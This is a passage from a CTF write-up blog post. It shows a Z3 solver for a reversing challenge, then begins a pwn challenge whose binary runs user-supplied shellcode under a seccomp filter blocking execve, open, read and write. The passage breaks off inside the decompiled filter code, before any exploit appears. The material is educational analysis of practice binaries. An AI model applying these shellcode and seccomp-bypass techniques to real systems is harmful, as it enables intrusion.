operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>n <span class=\"token operator\">&amp;</span> Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> N\n\n<span class=\"token comment\"># FUNC5</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC5<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">&amp;</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"creating-the-solver\" style=\"position:relative;\"><a href=\"#creating-the-solver\" aria-label=\"creating the solver permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Creating the Solver</h3>\n<p>Based on what I confirmed up to this point, I created the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> z3 <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nA <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"A\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nB <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"B\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nC <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"C\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nD <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"D\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nE <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"E\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nF <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"F\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nG <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"G\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"a\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"b\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"c\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"d\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"e\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"f\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"g\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\n\ns <span class=\"token operator\">=</span> Solver<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC1</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">-</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">+</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC3</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">*</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC4</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">^</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC5</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">&amp;</span> Y\n\n<span class=\"token comment\"># Range num</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>B <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>B <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>C <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>C <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>D <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>D <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>E <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>E <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>F <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>F <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">,</span>C<span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC3<span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> FUNC3<span class=\"token punctuation\">(</span><span class=\"token number\">3</span><span class=\"token punctuation\">,</span>A<span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>d<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> FUNC4<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>D<span class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>C<span class=\"token punctuation\">,</span>A<span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> FUNC5<span class=\"token punctuation\">(</span>B<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nh <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>B<span class=\"token punctuation\">,</span>D<span class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>D<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\ni <span class=\"token operator\">=</span> FUNC4<span class=\"token punctuation\">(</span>C<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nj <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>E<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\nk <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>E<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>\n    And<span class=\"token punctuation\">(</span>\n        <span class=\"token punctuation\">(</span>b <span class=\"token operator\">%</span> <span class=\"token number\">0x10ae961</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x3f29b9</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>c <span class=\"token operator\">%</span> <span class=\"token number\">0x1093a1d</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x8bdcd2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>e <span class=\"token operator\">%</span> f <span class=\"token operator\">==</span> <span class=\"token number\">0x212c944d</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>g <span class=\"token operator\">%</span> <span class=\"token number\">0x6e22</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x31be</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>h <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> A<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x2038c43c</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>i <span class=\"token operator\">%</span> <span class=\"token number\">0x1ce628</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x1386e2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>j <span class=\"token operator\">%</span> <span class=\"token number\">0x1172502</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x103cf4f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>k <span class=\"token operator\">%</span> <span class=\"token number\">0x2e16f83</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x16ab0d7</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> s<span class=\"token punctuation\">.</span>check<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> z3<span class=\"token punctuation\">.</span>sat<span class=\"token punctuation\">:</span>\n    m <span class=\"token operator\">=</span> s<span class=\"token punctuation\">.</span>model<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver gives a combination of integers that satisfies the conditions, and by feeding those values to the challenge binary I was able to obtain the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/800985fe3fb0b5b5aa871569790d1d16/b6e34/image-20240707150331663.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAjUlEQVQI13WPzQrCMBCE8yhqBZukjWnMfxpiWzz1VH3/d3EgPYgofAy7OwO7S5SPaVp0GoW2wjjo1XphbK+ttB41FMPBBa40lQoKqxWyYR1RLqzbM5Tp2DL04ER5Q/fik+ruAdadeU9Myuv2crkcLvQrXUHoHyTd57w8bC4qJLyg4wgFt5AGH3FzXfKTN39gLDq0sz+1AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/800985fe3fb0b5b5aa871569790d1d16/8ac56/image-20240707150331663.webp 240w,\n/static/800985fe3fb0b5b5aa871569790d1d16/d3be9/image-20240707150331663.webp 480w,\n/static/800985fe3fb0b5b5aa871569790d1d16/e46b2/image-20240707150331663.webp 960w,\n/static/800985fe3fb0b5b5aa871569790d1d16/33ecb/image-20240707150331663.webp 1103w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/800985fe3fb0b5b5aa871569790d1d16/8ff5a/image-20240707150331663.png 240w,\n/static/800985fe3fb0b5b5aa871569790d1d16/e85cb/image-20240707150331663.png 480w,\n/static/800985fe3fb0b5b5aa871569790d1d16/d9199/image-20240707150331663.png 960w,\n/static/800985fe3fb0b5b5aa871569790d1d16/b6e34/image-20240707150331663.png 1103w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/800985fe3fb0b5b5aa871569790d1d16/d9199/image-20240707150331663.png\"\n            alt=\"image-20240707150331663\"\n            title=\"image-20240707150331663\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This was a problem that could have been solved quickly with dynamic analysis, but I wasted a huge amount of time because I stubbornly insisted on solving it with static analysis and Z3Py.</p>\n<p>Looking back, it was very easy, but once you fall into a strange mental trap, it is hard to get out of it right away.</p>\n<h2 id=\"syscallspwn\" style=\"position:relative;\"><a href=\"#syscallspwn\" aria-label=\"syscallspwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Syscalls(Pwn)</h2>\n<p>The challenge binary has NX disabled.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 752px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/46d54d0c3d0533113e47cfe4c9345e98/442cb/image-20240708181828507.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAoElEQVQY05XNwY6CMBSF4VtKY6SMNmJMHGgRWkHFRN//5X47Ll1M4uJbnJucc2XfOobrkbh0nKZf5tvCZXlwvT/px8Q43wjjOUv0ccKfIn5I+NCTzpEQPNZanNtijEEKpZmnCzvXUBpNm/Y03nLoHLZaIyLfKXRBTANV/mJKodlltfCzke/H/pSlzoNjDoqVFrpaEbaKthLqf4pKqbfP+wtpiFqXXqBwhgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/46d54d0c3d0533113e47cfe4c9345e98/8ac56/image-20240708181828507.webp 240w,\n/static/46d54d0c3d0533113e47cfe4c9345e98/d3be9/image-20240708181828507.webp 480w,\n/static/46d54d0c3d0533113e47cfe4c9345e98/8cb39/image-20240708181828507.webp 752w\"\n              sizes=\"(max-width: 752px) 100vw, 752px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/46d54d0c3d0533113e47cfe4c9345e98/8ff5a/image-20240708181828507.png 240w,\n/static/46d54d0c3d0533113e47cfe4c9345e98/e85cb/image-20240708181828507.png 480w,\n/static/46d54d0c3d0533113e47cfe4c9345e98/442cb/image-20240708181828507.png 752w\"\n            sizes=\"(max-width: 752px) 100vw, 752px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/46d54d0c3d0533113e47cfe4c9345e98/442cb/image-20240708181828507.png\"\n            alt=\"image-20240708181828507\"\n            title=\"image-20240708181828507\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>When I decompiled the binary, I found that it executes the region containing the 0xb0 bytes read from standard input as code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined input_code <span class=\"token punctuation\">[</span><span class=\"token number\">184</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stderr</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token number\">0x0</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">get_code</span><span class=\"token punctuation\">(</span>input_code<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  seccomp<span class=\"token operator\">-</span><span class=\"token function\">install</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">run_code</span><span class=\"token punctuation\">(</span>input_code<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">get_code</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>\n      <span class=\"token string\">\"The flag is in a file named flag.txt located in the same directory as this binary. That\\'s al l the information I can give you.\"</span>\n      <span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">,</span><span class=\"token number\">0xb0</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">run_code</span><span class=\"token punctuation\">(</span>code <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>If that were all, exploiting it would look easy, but unfortunately this code installs a seccomp filter after receiving the input, and we can see that system calls such as <code class=\"language-text\">execve</code>, <code class=\"language-text\">execveat</code>, <code class=\"language-text\">fork</code>, <code class=\"language-text\">open</code>, <code class=\"language-text\">read</code>, and <code class=\"language-text\">write</code> are all prohibited.</p>\n<p>Reference: <a href=\"/ctf-pwn-gachi-rop-en\">Pwn Super Intro 2 for Beginner CTFers - Bypassing seccomp and Shellcode Basics -</a></p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> seccomp<span class=\"token operator\">-</span><span class=\"token function\">install</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined2 local_e8 <span class=\"token punctuation\">[</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined8 <span class=\"token operator\">*</span>local_e0<span class=\"token punctuation\">;</span>\n  undefined8 local_d8<span class=\"token punctuation\">;</span>\n  undefined8 local_d0<span class=\"token punctuation\">;</span>\n  undefined8 local_c8<span class=\"token punctuation\">;</span>\n  undefined8 local_c0<span class=\"token punctuation\">;</span>\n  undefined8 local_b8<span class=\"token punctuation\">;</span>\n  undefined8 local_b0<span class=\"token punctuation\">;</span>\n  undefined8 local_a8<span class=\"token punctuation\">;</span>\n  undefined8 local_a0<span class=\"token punctuation\">;</span>\n  undefined8 local_98<span class=\"token punctuation\">;</span>\n  undefined8 local_90<span class=\"token punctuation\">;</span>\n  undefined8 local_88<span class=\"token punctuation\">;</span>\n  undefined8 local_80<span class=\"token punctuation\">;</span>\n  undefined8 local_78<span class=\"token punctuation\">;</span>\n  undefined8 local_70<span class=\"token punctuation\">;</span>\n  undefined8 local_68<span class=\"token punctuation\">;</span>\n  undefined8 local_60<span class=\"token punctuation\">;</span>\n  undefined8 local_58<span class=\"token punctuation\">;</span>\n  undefined8 local_50<span class=\"token punctuation\">;</span>\n  undefined8 local_48<span class=\"token punctuation\">;</span>\n  undefined8 local_40<span class=\"token punctuation\">;</span>\n  undefined8 local_38<span class=\"token punctuation\">;</span>\n  undefined8 local_30<span class=\"token punctuation\">;</span>\n  undefined8 local_28<span class=\"token punctuation\">;</span>\n  undefined8 local_20<span class=\"token punctuation\">;</span>\n  undefined8 local_18<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token 